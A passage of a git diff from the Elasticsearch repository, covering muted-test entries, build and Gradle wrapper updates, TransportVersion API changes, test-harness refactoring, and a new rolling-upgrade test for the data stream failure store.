test140CgroupOsStatsAreAvailable + issue: https://github.com/elastic/elasticsearch/issues/131372 +- class: org.elasticsearch.packaging.test.DockerTests + method: test070BindMountCustomPathConfAndJvmOptions + issue: https://github.com/elastic/elasticsearch/issues/131366 +- class: org.elasticsearch.packaging.test.DockerTests + method: test171AdditionalCliOptionsAreForwarded + issue: https://github.com/elastic/elasticsearch/issues/120925 +- class: org.elasticsearch.packaging.test.DockerTests + method: test130JavaHasCorrectOwnership + issue: https://github.com/elastic/elasticsearch/issues/131369 +- class: org.elasticsearch.packaging.test.DockerTests + method: test151MachineDependentHeapWithSizeOverride + issue: https://github.com/elastic/elasticsearch/issues/123437 +- class: org.elasticsearch.search.sort.FieldSortIT + method: testSortMixedFieldTypes + issue: https://github.com/elastic/elasticsearch/issues/129445 +- class: org.elasticsearch.gradle.LoggedExecFuncTest + method: failed tasks output logged to console when spooling true + issue: https://github.com/elastic/elasticsearch/issues/119509 +- class: org.elasticsearch.packaging.test.DockerTests + method: test010Install + issue: https://github.com/elastic/elasticsearch/issues/131376 +- class: org.elasticsearch.packaging.test.DockerTests + method: test072RunEsAsDifferentUserAndGroup + issue: https://github.com/elastic/elasticsearch/issues/131412 +- class: org.elasticsearch.xpack.search.CrossClusterAsyncSearchIT + method: testRemoteClusterOnlyCCSWithFailuresOnOneShardOnly + issue: https://github.com/elastic/elasticsearch/issues/133673 +- class: org.elasticsearch.xpack.search.CrossClusterAsyncSearchIT + method: testCancelViaExpirationOnRemoteResultsWithMinimizeRoundtrips + issue: https://github.com/elastic/elasticsearch/issues/127302 +- class: org.elasticsearch.xpack.search.CrossClusterAsyncSearchIT + method: testCancellationViaTimeoutWithAllowPartialResultsSetToFalse + issue: https://github.com/elastic/elasticsearch/issues/131248 +- class: org.elasticsearch.xpack.kql.parser.KqlParserBooleanQueryTests + method: testParseAndQuery + issue: https://github.com/elastic/elasticsearch/issues/133871 +- class: org.elasticsearch.xpack.kql.parser.KqlParserBooleanQueryTests + method: testParseOrQuery + issue: https://github.com/elastic/elasticsearch/issues/133863 +- class: org.elasticsearch.xpack.writeloadforecaster.WriteLoadForecasterIT + method: testWriteLoadForecastGetsPopulatedDuringRollovers + issue: https://github.com/elastic/elasticsearch/issues/134123 # Examples: # diff --git a/plugins/discovery-ec2/build.gradle b/plugins/discovery-ec2/build.gradle index 454508d0298f9..f4eb1d3a90f01 100644 --- a/plugins/discovery-ec2/build.gradle +++ b/plugins/discovery-ec2/build.gradle @@ -15,31 +15,6 @@ esplugin { classname ='org.elasticsearch.discovery.ec2.Ec2DiscoveryPlugin' } -def patched = Attribute.of('patched', Boolean) - -configurations { - compileClasspath { - attributes { - attribute(patched, true) - } - } - runtimeClasspath { - attributes { - attribute(patched, true) - } - } - testCompileClasspath { - attributes { - attribute(patched, true) - } - } - testRuntimeClasspath { - attributes { - attribute(patched, true) - } - } -} - dependencies { implementation "software.amazon.awssdk:annotations:${versions.awsv2sdk}" @@ -90,17 +65,6 @@ dependencies { testImplementation project(':test:fixtures:ec2-imds-fixture') internalClusterTestImplementation project(':test:fixtures:ec2-imds-fixture') - - attributesSchema { - attribute(patched) - } - artifactTypes.getByName("jar") { - attributes.attribute(patched, false) - } - registerTransform(org.elasticsearch.gradle.internal.dependencies.patches.awsv2sdk.Awsv2ClassPatcher) { - from.attribute(patched, false) - to.attribute(patched, true) - } } tasks.named("dependencyLicenses").configure { diff --git a/plugins/examples/custom-suggester/src/main/java/org/elasticsearch/example/customsuggester/CustomSuggestionBuilder.java b/plugins/examples/custom-suggester/src/main/java/org/elasticsearch/example/customsuggester/CustomSuggestionBuilder.java index 8aaa9ee5ad5e7..d72c04edc815e 100644 --- a/plugins/examples/custom-suggester/src/main/java/org/elasticsearch/example/customsuggester/CustomSuggestionBuilder.java +++ b/plugins/examples/custom-suggester/src/main/java/org/elasticsearch/example/customsuggester/CustomSuggestionBuilder.java @@ -134,6 +134,6 @@ public SuggestionSearchContext.SuggestionContext build(SearchExecutionContext co @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/plugins/examples/gradle/wrapper/gradle-wrapper.properties b/plugins/examples/gradle/wrapper/gradle-wrapper.properties index c4a852da571d7..01450089d2c6c 100644 --- a/plugins/examples/gradle/wrapper/gradle-wrapper.properties +++ b/plugins/examples/gradle/wrapper/gradle-wrapper.properties @@ -1,7 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionSha256Sum=443c9c8ee2ac1ee0e11881a40f2376d79c66386264a44b24a9f8ca67e633375f -distributionUrl=https\://services.gradle.org/distributions/gradle-8.14.2-all.zip +distributionSha256Sum=f759b8dd5204e2e3fa4ca3e73f452f087153cf81bac9561eeb854229cc2c5365 +distributionUrl=https\://services.gradle.org/distributions/gradle-9.0.0-all.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/plugins/examples/rescore/src/main/java/org/elasticsearch/example/rescore/ExampleRescoreBuilder.java b/plugins/examples/rescore/src/main/java/org/elasticsearch/example/rescore/ExampleRescoreBuilder.java index 4beb926bea752..a8e1c4f2c8382 100644 --- a/plugins/examples/rescore/src/main/java/org/elasticsearch/example/rescore/ExampleRescoreBuilder.java +++ b/plugins/examples/rescore/src/main/java/org/elasticsearch/example/rescore/ExampleRescoreBuilder.java @@ -222,6 +222,6 @@ public Explanation explain(int topLevelDocId, IndexSearcher searcher, RescoreCon @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/plugins/store-smb/src/main/plugin-metadata/entitlement-policy.yaml b/plugins/store-smb/src/main/plugin-metadata/entitlement-policy.yaml index 1022253171a11..dbe45c7527967 100644 --- a/plugins/store-smb/src/main/plugin-metadata/entitlement-policy.yaml +++ b/plugins/store-smb/src/main/plugin-metadata/entitlement-policy.yaml @@ -3,3 +3,6 @@ ALL-UNNAMED: - relative_path: "indices/" relative_to: data mode: read_write + - relative_path: "" + relative_to: shared_data + mode: read_write diff --git a/qa/ccs-common-rest/src/yamlRestTest/java/org/elasticsearch/test/rest/yaml/CcsCommonYamlTestSuiteIT.java b/qa/ccs-common-rest/src/yamlRestTest/java/org/elasticsearch/test/rest/yaml/CcsCommonYamlTestSuiteIT.java index 44abbf2652f95..c70827aeb2ec3 100644 --- a/qa/ccs-common-rest/src/yamlRestTest/java/org/elasticsearch/test/rest/yaml/CcsCommonYamlTestSuiteIT.java +++ b/qa/ccs-common-rest/src/yamlRestTest/java/org/elasticsearch/test/rest/yaml/CcsCommonYamlTestSuiteIT.java @@ -52,6 +52,8 @@ import java.util.Map; import java.util.Optional; import java.util.Set; +import java.util.concurrent.atomic.AtomicBoolean; +import java.util.concurrent.atomic.AtomicReference; import java.util.function.BiPredicate; import java.util.stream.Collectors; import java.util.stream.Stream; @@ -67,7 +69,7 @@ * using the client running against the "write" cluster. * */ -@TimeoutSuite(millis = 15 * TimeUnits.MINUTE) // to account for slow as hell VMs +@TimeoutSuite(millis = 20 * TimeUnits.MINUTE) // to account for slow as hell VMs public class CcsCommonYamlTestSuiteIT extends ESClientYamlSuiteTestCase { private static final Logger logger = LogManager.getLogger(CcsCommonYamlTestSuiteIT.class); @@ -78,6 +80,12 @@ public class CcsCommonYamlTestSuiteIT extends ESClientYamlSuiteTestCase { // the remote cluster is the one we write index operations etc... to private static final String REMOTE_CLUSTER_NAME = "remote_cluster"; + private static final AtomicBoolean isRemoteConfigured = new AtomicBoolean(false); + private static final AtomicBoolean isCombinedComputed = new AtomicBoolean(false); + private static final AtomicReference combinedTestFeatureServiceRef = new AtomicReference<>(); + private static final AtomicReference> combinedOsSetRef = new AtomicReference<>(); + private static final AtomicReference> combinedNodeVersionsRef = new AtomicReference<>(); + private static LocalClusterConfigProvider commonClusterConfig = cluster -> cluster.module("x-pack-async-search") .module("aggregations") .module("analysis-common") @@ -163,25 +171,26 @@ public void initSearchClient() throws IOException { } clusterHosts = unmodifiableList(hosts); logger.info("initializing REST search clients against {}", clusterHosts); - searchClient = buildClient(restClientSettings(), clusterHosts.toArray(new HttpHost[clusterHosts.size()])); - adminSearchClient = buildClient(restAdminSettings(), clusterHosts.toArray(new HttpHost[clusterHosts.size()])); + searchClient = buildClient(restClientSettings(), clusterHosts.toArray(new HttpHost[0])); + adminSearchClient = buildClient(restAdminSettings(), clusterHosts.toArray(new HttpHost[0])); searchYamlTestClient = new TestCandidateAwareClient(getRestSpec(), searchClient, hosts, this::getClientBuilderWithSniffedHosts); - // check that we have an established CCS connection - Request request = new Request("GET", "_remote/info"); - Response response = adminSearchClient.performRequest(request); - assertOK(response); - ObjectPath responseObject = ObjectPath.createFromResponse(response); - assertNotNull(responseObject.evaluate(REMOTE_CLUSTER_NAME)); - assertNull(responseObject.evaluate(REMOTE_CLUSTER_NAME + ".cluster_credentials")); - logger.info("Established connection to remote cluster [" + REMOTE_CLUSTER_NAME + "]"); + assert searchClient != null; + assert adminSearchClient != null; + assert clusterHosts != null; + + if (isRemoteConfigured.compareAndSet(false, true)) { + // check that we have an established CCS connection + Request request = new Request("GET", "_remote/info"); + Response response = adminSearchClient.performRequest(request); + assertOK(response); + ObjectPath responseObject = ObjectPath.createFromResponse(response); + assertNotNull(responseObject.evaluate(REMOTE_CLUSTER_NAME)); + assertNull(responseObject.evaluate(REMOTE_CLUSTER_NAME + ".cluster_credentials")); + logger.info("Established connection to remote cluster [" + REMOTE_CLUSTER_NAME + "]"); + } } - - assert searchClient != null; - assert adminSearchClient != null; - assert clusterHosts != null; - searchYamlTestClient.setTestCandidate(getTestCandidate()); } @@ -299,44 +308,46 @@ protected ClientYamlTestExecutionContext createRestTestExecutionContext( final Set osSet ) { try { - // Ensure the test specific initialization is run by calling it explicitly (@Before annotations on base-derived class may - // be called in a different order) - initSearchClient(); - // Reconcile and provide unified features, os, version(s), based on both clientYamlTestClient and searchYamlTestClient - var searchOs = readOsFromNodesInfo(adminSearchClient); - var searchNodeVersions = readVersionsFromNodesInfo(adminSearchClient); - var semanticNodeVersions = searchNodeVersions.stream() - .map(ESRestTestCase::parseLegacyVersion) - .flatMap(Optional::stream) - .collect(Collectors.toSet()); - final TestFeatureService searchTestFeatureService = createTestFeatureService( - getClusterStateFeatures(adminSearchClient), - semanticNodeVersions - ); - final TestFeatureService combinedTestFeatureService = (featureId, any) -> { - boolean adminFeature = testFeatureService.clusterHasFeature(featureId, any); - boolean searchFeature = searchTestFeatureService.clusterHasFeature(featureId, any); - return any ? adminFeature || searchFeature : adminFeature && searchFeature; - }; - final Set combinedOsSet = Stream.concat(osSet.stream(), Stream.of(searchOs)).collect(Collectors.toSet()); - final Set combinedNodeVersions = Stream.concat(nodesVersions.stream(), searchNodeVersions.stream()) - .collect(Collectors.toSet()); + if (isCombinedComputed.compareAndSet(false, true)) { + // Ensure the test specific initialization is run by calling it explicitly (@Before annotations on base-derived class may + // be called in a different order) + initSearchClient(); + // Reconcile and provide unified features, os, version(s), based on both clientYamlTestClient and searchYamlTestClient + var searchOs = readOsFromNodesInfo(adminSearchClient); + var searchNodeVersions = readVersionsFromNodesInfo(adminSearchClient); + var semanticNodeVersions = searchNodeVersions.stream() + .map(ESRestTestCase::parseLegacyVersion) + .flatMap(Optional::stream) + .collect(Collectors.toSet()); + final TestFeatureService searchTestFeatureService = createTestFeatureService( + getClusterStateFeatures(adminSearchClient), + semanticNodeVersions + ); + final TestFeatureService combinedTestFeatureService = (featureId, any) -> { + boolean adminFeature = testFeatureService.clusterHasFeature(featureId, any); + boolean searchFeature = searchTestFeatureService.clusterHasFeature(featureId, any); + return any ? adminFeature || searchFeature : adminFeature && searchFeature; + }; + final Set combinedOsSet = Stream.concat(osSet.stream(), Stream.of(searchOs)).collect(Collectors.toSet()); + final Set combinedNodeVersions = Stream.concat(nodesVersions.stream(), searchNodeVersions.stream()) + .collect(Collectors.toSet()); + + combinedTestFeatureServiceRef.set(combinedTestFeatureService); + combinedOsSetRef.set(combinedOsSet); + combinedNodeVersionsRef.set(combinedNodeVersions); + } return new ClientYamlTestExecutionContext( clientYamlTestCandidate, clientYamlTestClient, randomizeContentType(), - combinedNodeVersions, - combinedTestFeatureService, - combinedOsSet + combinedNodeVersionsRef.get(), + combinedTestFeatureServiceRef.get(), + combinedOsSetRef.get() ) { // depending on the API called, we either return the client running against the "write" or the "search" cluster here protected ClientYamlTestClient clientYamlTestClient(String apiName) { - if (CCS_APIS.contains(apiName)) { - return searchYamlTestClient; - } else { - return super.clientYamlTestClient(apiName); - } + return CCS_APIS.contains(apiName) ? searchYamlTestClient : super.clientYamlTestClient(apiName); } }; } catch (IOException e) { diff --git a/qa/ccs-common-rest/src/yamlRestTest/java/org/elasticsearch/test/rest/yaml/RcsCcsCommonYamlTestSuiteIT.java b/qa/ccs-common-rest/src/yamlRestTest/java/org/elasticsearch/test/rest/yaml/RcsCcsCommonYamlTestSuiteIT.java index 0471366b0bd53..9b57fdcaca031 100644 --- a/qa/ccs-common-rest/src/yamlRestTest/java/org/elasticsearch/test/rest/yaml/RcsCcsCommonYamlTestSuiteIT.java +++ b/qa/ccs-common-rest/src/yamlRestTest/java/org/elasticsearch/test/rest/yaml/RcsCcsCommonYamlTestSuiteIT.java @@ -64,7 +64,7 @@ * using the client running against the "write" cluster. * */ -@TimeoutSuite(millis = 20 * TimeUnits.MINUTE) // to account for slow as hell VMs +@TimeoutSuite(millis = 25 * TimeUnits.MINUTE) // to account for slow as hell VMs public class RcsCcsCommonYamlTestSuiteIT extends ESClientYamlSuiteTestCase { private static final Logger logger = LogManager.getLogger(RcsCcsCommonYamlTestSuiteIT.class); diff --git a/qa/full-cluster-restart/src/javaRestTest/java/org/elasticsearch/upgrades/QueryBuilderBWCIT.java b/qa/full-cluster-restart/src/javaRestTest/java/org/elasticsearch/upgrades/QueryBuilderBWCIT.java index 6ecb85258ed97..d336de92c3e93 100644 --- a/qa/full-cluster-restart/src/javaRestTest/java/org/elasticsearch/upgrades/QueryBuilderBWCIT.java +++ b/qa/full-cluster-restart/src/javaRestTest/java/org/elasticsearch/upgrades/QueryBuilderBWCIT.java @@ -12,7 +12,6 @@ import com.carrotsearch.randomizedtesting.annotations.Name; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.Version; import org.elasticsearch.client.Request; import org.elasticsearch.client.Response; @@ -254,7 +253,7 @@ public void testQueryBuilderBWC() throws Exception { TransportVersion transportVersion; if (originalClusterHasTransportVersion == false) { transportVersion = TransportVersion.fromId( - parseLegacyVersion(getOldClusterVersion()).map(Version::id).orElse(TransportVersions.MINIMUM_COMPATIBLE.id()) + parseLegacyVersion(getOldClusterVersion()).map(Version::id).orElse(TransportVersion.minimumCompatible().id()) ); } else { transportVersion = TransportVersion.readVersion(input); diff --git a/qa/mixed-cluster/build.gradle b/qa/mixed-cluster/build.gradle index dfe4052b09aff..a591d4c590b27 100644 --- a/qa/mixed-cluster/build.gradle +++ b/qa/mixed-cluster/build.gradle @@ -89,6 +89,7 @@ buildParams.bwcVersions.withWireCompatible { bwcVersion, baseName -> setting 'health.master_history.no_master_transitions_threshold', '10' } requiresFeature 'es.index_mode_feature_flag_registered', Version.fromString("8.0.0") + requiresFeature 'sub_objects_auto', Version.fromString("8.16.0") if (bwcVersion.before(Version.fromString("8.18.0"))) { jvmArgs '-da:org.elasticsearch.index.mapper.DocumentMapper' jvmArgs '-da:org.elasticsearch.index.mapper.MapperService' diff --git a/qa/multi-cluster-search/src/test/java/org/elasticsearch/search/CCSDuelIT.java b/qa/multi-cluster-search/src/test/java/org/elasticsearch/search/CCSDuelIT.java index 79cdc1047aec9..715a009692bf5 100644 --- a/qa/multi-cluster-search/src/test/java/org/elasticsearch/search/CCSDuelIT.java +++ b/qa/multi-cluster-search/src/test/java/org/elasticsearch/search/CCSDuelIT.java @@ -1333,6 +1333,7 @@ private static Map responseToMap(ObjectPath response) throws IOE Map responseMap = XContentHelper.convertToMap(bytesReference, false, XContentType.JSON).v2(); assertNotNull(responseMap.put("took", -1)); responseMap.remove("num_reduce_phases"); + responseMap.remove("terminated_early"); Map profile = (Map) responseMap.get("profile"); if (profile != null) { List> shards = (List>) profile.get("shards"); diff --git a/qa/packaging/src/test/java/org/elasticsearch/packaging/test/ArchiveTests.java b/qa/packaging/src/test/java/org/elasticsearch/packaging/test/ArchiveTests.java index 14178e84969ed..6bcd17a94c1d8 100644 --- a/qa/packaging/src/test/java/org/elasticsearch/packaging/test/ArchiveTests.java +++ b/qa/packaging/src/test/java/org/elasticsearch/packaging/test/ArchiveTests.java @@ -212,14 +212,14 @@ public void test50AutoConfigurationFailsWhenCertificatesNotGenerated() throws Ex FileUtils.assertPathsDoNotExist(installation.data); Path tempDir = createTempDir("bc-backup"); Files.move( - installation.lib.resolve("tools").resolve("security-cli").resolve("bcprov-jdk18on-1.78.1.jar"), - tempDir.resolve("bcprov-jdk18on-1.78.1.jar") + installation.lib.resolve("tools").resolve("security-cli").resolve("bcprov-jdk18on-1.79.jar"), + tempDir.resolve("bcprov-jdk18on-1.79.jar") ); Shell.Result result = runElasticsearchStartCommand(null, false, false); assertElasticsearchFailure(result, "java.lang.NoClassDefFoundError: org/bouncycastle/", null); Files.move( - tempDir.resolve("bcprov-jdk18on-1.78.1.jar"), - installation.lib.resolve("tools").resolve("security-cli").resolve("bcprov-jdk18on-1.78.1.jar") + tempDir.resolve("bcprov-jdk18on-1.79.jar"), + installation.lib.resolve("tools").resolve("security-cli").resolve("bcprov-jdk18on-1.79.jar") ); Platforms.onWindows(() -> sh.chown(installation.config)); FileUtils.rm(tempDir); diff --git a/qa/packaging/src/test/java/org/elasticsearch/packaging/test/PackagingTestCase.java b/qa/packaging/src/test/java/org/elasticsearch/packaging/test/PackagingTestCase.java index a157cc84e624e..2db2ebb618d02 100644 --- a/qa/packaging/src/test/java/org/elasticsearch/packaging/test/PackagingTestCase.java +++ b/qa/packaging/src/test/java/org/elasticsearch/packaging/test/PackagingTestCase.java @@ -145,6 +145,10 @@ public abstract class PackagingTestCase extends Assert { @Override protected void failed(Throwable e, Description description) { failed = true; + if (installation != null && installation.distribution.isDocker()) { + logger.warn("Test {} failed. Printing logs for failed test...", description.getMethodName()); + dumpDebug(); + } } }; diff --git a/qa/packaging/src/test/java/org/elasticsearch/packaging/util/ServerUtils.java b/qa/packaging/src/test/java/org/elasticsearch/packaging/util/ServerUtils.java index ea71308b11940..f915388011ed9 100644 --- a/qa/packaging/src/test/java/org/elasticsearch/packaging/util/ServerUtils.java +++ b/qa/packaging/src/test/java/org/elasticsearch/packaging/util/ServerUtils.java @@ -150,7 +150,19 @@ private static HttpResponse execute(Request request, String username, String pas executor.auth(username, password); executor.authPreemptive(new HttpHost("localhost", 9200)); } - return executor.execute(request).returnResponse(); + try { + return executor.execute(request).returnResponse(); + } catch (Exception e) { + logger.warn( + "Failed to execute request [{}] with username/password [{}/{}] and caCert [{}]", + request.toString(), + username, + password, + caCert, + e + ); + throw e; + } } // polls every two seconds for Elasticsearch to be running on 9200 @@ -238,14 +250,13 @@ public static void waitForElasticsearch( long timeElapsed = 0; boolean started = false; Throwable thrownException = null; - if (caCert == null) { - caCert = getCaCert(installation); - } while (started == false && timeElapsed < waitTime) { if (System.currentTimeMillis() - lastRequest > requestInterval) { + if (caCert == null) { + caCert = getCaCert(installation); + } try { - final HttpResponse response = execute( Request.Get((caCert != null ? "https" : "http") + "://localhost:9200/_cluster/health") .connectTimeout((int) timeoutLength) @@ -276,7 +287,7 @@ public static void waitForElasticsearch( } started = true; - } catch (IOException e) { + } catch (Exception e) { if (thrownException == null) { thrownException = e; } else { diff --git a/qa/packaging/src/test/java/org/elasticsearch/packaging/util/docker/Docker.java b/qa/packaging/src/test/java/org/elasticsearch/packaging/util/docker/Docker.java index ab167d7663be1..a17ae7781db48 100644 --- a/qa/packaging/src/test/java/org/elasticsearch/packaging/util/docker/Docker.java +++ b/qa/packaging/src/test/java/org/elasticsearch/packaging/util/docker/Docker.java @@ -73,7 +73,7 @@ public class Docker { public static final Shell sh = new Shell(); public static final DockerShell dockerShell = new DockerShell(); public static final int STARTUP_SLEEP_INTERVAL_MILLISECONDS = 1000; - public static final int STARTUP_ATTEMPTS_MAX = 30; + public static final int STARTUP_ATTEMPTS_MAX = 45; /** * The length of the command exceeds what we can use for COLUMNS so we use diff --git a/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/FailureStoreUpgradeIT.java b/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/FailureStoreUpgradeIT.java new file mode 100644 index 0000000000000..66caca9c1c51a --- /dev/null +++ b/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/FailureStoreUpgradeIT.java @@ -0,0 +1,229 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.upgrades; + +import com.carrotsearch.randomizedtesting.annotations.Name; + +import org.elasticsearch.client.Request; +import org.elasticsearch.client.Response; +import org.elasticsearch.client.ResponseException; +import org.elasticsearch.cluster.metadata.DataStream; +import org.elasticsearch.common.time.DateFormatter; +import org.elasticsearch.common.time.FormatNames; +import org.elasticsearch.test.rest.ObjectPath; + +import java.io.IOException; +import java.time.Instant; +import java.util.Map; + +import static org.elasticsearch.cluster.metadata.DataStreamTestHelper.backingIndexEqualTo; +import static org.elasticsearch.cluster.metadata.DataStreamTestHelper.dataStreamIndexEqualTo; +import static org.hamcrest.Matchers.anyOf; +import static org.hamcrest.Matchers.empty; +import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.hasSize; +import static org.hamcrest.Matchers.is; +import static org.hamcrest.Matchers.not; +import static org.hamcrest.Matchers.notNullValue; + +public class FailureStoreUpgradeIT extends AbstractRollingUpgradeWithSecurityTestCase { + + public FailureStoreUpgradeIT(@Name("upgradedNodes") int upgradedNodes) { + super(upgradedNodes); + } + + final String INDEX_TEMPLATE = """ + { + "index_patterns": ["$PATTERN"], + "data_stream": {}, + "template": { + "mappings":{ + "properties": { + "@timestamp" : { + "type": "date" + }, + "numeral": { + "type": "long" + } + } + } + } + }"""; + + private static final String VALID_DOC = """ + {"@timestamp": "$now", "numeral": 0} + """; + + private static final String INVALID_DOC = """ + {"@timestamp": "$now", "numeral": "foobar"} + """; + + private static final String BULK = """ + {"create": {}} + {"@timestamp": "$now", "numeral": 0} + {"create": {}} + {"@timestamp": "$now", "numeral": 1} + {"create": {}} + {"@timestamp": "$now", "numeral": 2} + {"create": {}} + {"@timestamp": "$now", "numeral": 3} + {"create": {}} + {"@timestamp": "$now", "numeral": 4} + """; + + private static final String ENABLE_FAILURE_STORE_OPTIONS = """ + { + "failure_store": { + "enabled": true + } + } + """; + + public void testFailureStoreOnPreviouslyExistingDataStream() throws Exception { + assumeFalse( + "testing migration from data streams created before failure store feature existed", + oldClusterHasFeature(DataStream.DATA_STREAM_FAILURE_STORE_FEATURE) + ); + String dataStreamName = "fs-ds-upgrade-test"; + String failureStoreName = dataStreamName + "::failures"; + String templateName = "fs-ds-template"; + if (isOldCluster()) { + // Create template + var putIndexTemplateRequest = new Request("POST", "/_index_template/" + templateName); + putIndexTemplateRequest.setJsonEntity(INDEX_TEMPLATE.replace("$PATTERN", dataStreamName)); + assertOK(client().performRequest(putIndexTemplateRequest)); + + // Initialize data stream + executeBulk(dataStreamName); + + // Ensure document failure + indexDoc(dataStreamName, INVALID_DOC, false); + + // Check data stream state + var dataStreams = getDataStream(dataStreamName); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams"), hasSize(1)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.name"), equalTo(dataStreamName)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.generation"), equalTo(1)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.template"), equalTo(templateName)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.indices"), hasSize(1)); + String firstBackingIndex = ObjectPath.evaluate(dataStreams, "data_streams.0.indices.0.index_name"); + assertThat(firstBackingIndex, backingIndexEqualTo(dataStreamName, 1)); + + assertDocCount(client(), dataStreamName, 5); + } else if (isMixedCluster()) { + ensureHealth(dataStreamName, request -> request.addParameter("wait_for_status", "yellow")); + if (isFirstMixedCluster()) { + indexDoc(dataStreamName, VALID_DOC, true); + indexDoc(dataStreamName, INVALID_DOC, false); + } + assertDocCount(client(), dataStreamName, 6); + } else if (isUpgradedCluster()) { + ensureGreen(dataStreamName); + + // Ensure correct default failure store state for upgraded data stream + var dataStreams = getDataStream(dataStreamName); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams"), hasSize(1)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.name"), equalTo(dataStreamName)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store"), notNullValue()); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.enabled"), equalTo(false)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.indices"), is(empty())); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.rollover_on_write"), equalTo(true)); + + // Ensure invalid document is not indexed + indexDoc(dataStreamName, INVALID_DOC, false); + + // Enable failure store on upgraded data stream + var putOptionsRequest = new Request("PUT", "/_data_stream/" + dataStreamName + "/_options"); + putOptionsRequest.setJsonEntity(ENABLE_FAILURE_STORE_OPTIONS); + assertOK(client().performRequest(putOptionsRequest)); + + // Ensure correct enabled failure store state + dataStreams = getDataStream(dataStreamName); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams"), hasSize(1)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.name"), equalTo(dataStreamName)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store"), notNullValue()); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.enabled"), equalTo(true)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.indices"), is(empty())); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.rollover_on_write"), equalTo(true)); + + // Initialize failure store + int expectedFailureDocuments = 0; + if (randomBoolean()) { + // Index a failure via a mapping exception + indexDoc(dataStreamName, INVALID_DOC, true); + expectedFailureDocuments = 1; + } else { + // Manually rollover failure store to force initialization + var failureStoreRolloverRequest = new Request("POST", "/" + failureStoreName + "/_rollover"); + assertOK(client().performRequest(failureStoreRolloverRequest)); + } + + // Ensure correct initialized failure store state + dataStreams = getDataStream(dataStreamName); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams"), hasSize(1)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.name"), equalTo(dataStreamName)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store"), notNullValue()); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.enabled"), equalTo(true)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.indices"), is(not(empty()))); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.rollover_on_write"), equalTo(false)); + + String failureIndexName = ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.indices.0.index_name"); + assertThat(failureIndexName, dataStreamIndexEqualTo(dataStreamName, 2, true)); + + assertDocCount(client(), dataStreamName, 6); + assertDocCount(client(), failureStoreName, expectedFailureDocuments); + } + } + + private static void indexDoc(String dataStreamName, String docBody, boolean expectSuccess) throws IOException { + var indexRequest = new Request("POST", "/" + dataStreamName + "/_doc"); + indexRequest.addParameter("refresh", "true"); + indexRequest.setJsonEntity(docBody.replace("$now", formatInstant(Instant.now()))); + Response response = null; + try { + response = client().performRequest(indexRequest); + } catch (ResponseException re) { + response = re.getResponse(); + } + assertNotNull(response); + if (expectSuccess) { + assertOK(response); + } else { + assertThat(response.getStatusLine().getStatusCode(), not(anyOf(equalTo(200), equalTo(201)))); + } + } + + private static void executeBulk(String dataStreamName) throws IOException { + var bulkRequest = new Request("POST", "/" + dataStreamName + "/_bulk"); + bulkRequest.setJsonEntity(BULK.replace("$now", formatInstant(Instant.now()))); + bulkRequest.addParameter("refresh", "true"); + Response response = null; + try { + response = client().performRequest(bulkRequest); + } catch (ResponseException re) { + response = re.getResponse(); + } + assertNotNull(response); + var responseBody = entityAsMap(response); + assertOK(response); + assertThat("errors in response:\n " + responseBody, responseBody.get("errors"), equalTo(false)); + } + + static String formatInstant(Instant instant) { + return DateFormatter.forPattern(FormatNames.STRICT_DATE_OPTIONAL_TIME.getName()).format(instant); + } + + private static Map getDataStream(String dataStreamName) throws IOException { + var getDataStreamsRequest = new Request("GET", "/_data_stream/" + dataStreamName); + var response = client().performRequest(getDataStreamsRequest); + assertOK(response); + return entityAsMap(response); + } +} diff --git a/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/RunningSnapshotIT.java b/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/RunningSnapshotIT.java index 261e92c5d7b65..3e2dfa24e7237 100644 --- a/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/RunningSnapshotIT.java +++ b/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/RunningSnapshotIT.java @@ -12,12 +12,10 @@ import com.carrotsearch.randomizedtesting.annotations.Name; import org.elasticsearch.client.Request; -import org.elasticsearch.common.Strings; import org.elasticsearch.common.settings.Settings; import 